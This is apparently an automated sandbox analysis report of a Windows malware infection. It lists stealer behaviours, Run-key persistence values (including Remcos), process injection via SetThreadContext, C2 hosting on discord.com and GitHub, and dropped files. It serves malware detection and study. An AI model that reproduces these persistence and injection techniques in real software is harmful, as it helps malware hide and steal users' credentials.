N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\wow.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\wow.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\New Text Document mod.exse\\a\\networkmanager.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\afasdfga = "C:\\Users\\Admin\\AppData\\Roaming\\afasdfga.exe" C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" C:\Users\Admin\Desktop\Files\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\Desktop\Files\twztl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\GameBarPresenceWriter.exe N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup\filelist.dat C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup32.dll C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup.dll C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2536 set thread context of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 set thread context of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 set thread context of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1092 set thread context of 3616 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3796 set thread context of 3012 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 2800 set thread context of 3984 N/A C:\Users\Admin\Desktop\Files\87f3f2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5012 set thread context of 5592 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
PID 1868 set thread context of 5600 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
PID 6728 set thread context of 5764 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 1528 set thread context of 6020 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
PID 3728 set thread context of 4496 N/A C:\Users\Admin\Desktop\Files\Mswgoudnv.exe C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
PID 408 set thread context of 6364 N/A C:\ProgramData\Remcos\remcos.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 7300 set thread context of 7028 N/A C:\Users\Admin\Desktop\Files\setup.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 6100 set thread context of 6716 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
PID 5060 set thread context of 7684 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
PID 5332 set thread context of 6436 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
PID 6332 set thread context of 5204 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
PID 2056 set thread context of 8600 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\system32\schtasks.exe
PID 680 set thread context of 7844 N/A C:\ProgramData\gnabpgw\wohcj.exe C:\ProgramData\gnabpgw\wohcj.exe
PID 6520 set thread context of 6588 N/A C:\Users\Admin\Desktop\Files\yiklfON.exe C:\Users\Admin\Desktop\Files\yiklfON.exe
PID 8248 set thread context of 6412 N/A C:\ProgramData\gnabpgw\wohcj.exe C:\ProgramData\gnabpgw\wohcj.exe
PID 6872 set thread context of 7336 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 12672 set thread context of 5784 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 11400 set thread context of 10152 N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\f21.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-DCU30.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-AHIH9.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-N5V1T.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-PRVGE.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-2FP8S.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\back3.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\d1.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\ac2.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\Languages\is-HIV3C.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\Languages\is-T4OHF.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\x2.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\t1.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File created C:\Program Files (x86)\Kuwait Ice Hockey DB\is-8KV2G.tmp C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-GT5TL.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\w2.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-2S9QH.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\back.png C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\AnyDesk\AnyDesk.exe C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-FBO4V.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-QFNHP.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.htm C:\Users\Admin\Desktop\Files\wow.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-FGGQA.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-IBUCV.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\x1.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
File created C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-C95O9.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-SVBK7.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\w1.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.gif C:\Users\Admin\Desktop\Files\wow.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\ac1.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-F36PK.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-8ANHN.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-VFT99.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
